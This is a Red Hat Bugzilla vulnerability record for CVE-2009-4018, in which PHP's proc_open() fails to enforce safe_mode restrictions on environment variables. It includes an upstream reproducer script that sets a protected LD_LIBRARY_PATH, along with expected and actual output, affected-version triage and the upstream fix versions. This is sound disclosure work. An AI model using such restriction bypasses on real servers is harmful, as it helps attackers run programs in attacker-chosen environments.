Bug 541239 (CVE-2009-4018)
| Summary: | CVE-2009-4018 php: proc_open() safe mode restriction bypass | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED DUPLICATE | QA Contact: | |
| Severity: | low | Docs Contact: | |
| Priority: | low | ||
| Version: | unspecified | CC: | jorton |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://bugs.php.net/bug.php?id=49026 | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: | Story Points: | --- | |
| Clone Of: | Environment: | ||
| Last Closed: | 2009-11-25 15:25:46 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
|
Description
Jan Lieskovsky
2009-11-25 10:56:04 UTC
Reproducer (from upstream bug report):
--------------------------------------
In php.ini:
safe_mode = On
safe_mode_gid = On
safe_mode_include_dir =
safe_mode_exec_dir = /usr/bin/safe
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
Sample PHP script:
<?
putenv("BLAHBLAH=123");
putenv("LD_LIBRARY_PATH=/no/way");
putenv("PHP_TESTVAR=allowed");
$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way',
'PHP_TESTVAR' => 'allowed');
$dptspec = array(0 => array("pipe", "r"),
1 => array("pipe", "w"));
$fp = proc_open('env', $dptspec, $pipes, './', $env);
echo "<pre>";
while(!feof($pipes[1])) echo fgets($pipes[1], 1024);
fclose($pipes[1]);
echo "</pre>";
?>
Expected result:
----------------
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot set
environment variable 'BLAHBLAH' - it's not in the allowed list in
/my/path/test.php on line 2
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot override
protected environment variable 'LD_LIBRARY_PATH' in /my/path/test.php on
line 3
PHP_TESTVAR=allowed
PWD=/my/path
Actual result:
--------------
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot set
environment variable 'BLAHBLAH' - it's not in the allowed list in
/my/path/test.php on line 2
Warning: putenv() [function.putenv]: Safe Mode warning: Cannot override
protected environment variable 'LD_LIBRARY_PATH' in /my/path/test.php on
line 3
LD_LIBRARY_PATH=/no/way
PHP_TESTVAR=allowed
BLAHBLAH=123
PWD=/my/path
This issue does NOT affect the versions of the php package, as shipped with Red Hat Enterprise Linux 3 and 4. This issue affects the version of the php package, as shipped with Red Hat Enterprise Linux 5. (In reply to comment #2) > This issue does NOT affect the versions of the php package, as shipped > with Red Hat Enterprise Linux 3 and 4. proc_open only support cwd, env and other_options parameters as of version 5.0: http://www.php.net/manual/en/function.proc-open.php#function.proc-open.changelog This should only be relevant in configurations where safe_mode is on, safe_mode_exec_dir is set to some non-default value (default is /usr/bin, which can be easily bypassed by executing e.g. perl or python), and the command execution functions are not in the disable_functions list. Issue was fixed upstream in 5.2.11 and 5.3.1. *** This bug has been marked as a duplicate of bug 169857 *** Mitre's CVE-2009-4018 record: ----------------------------- The proc_open function in ext/standard/proc_open.c in PHP before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1) safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars directives, which allows context-dependent attackers to execute programs with an arbitrary environment via the env parameter, as demonstrated by a crafted value of the LD_LIBRARY_PATH environment variable. |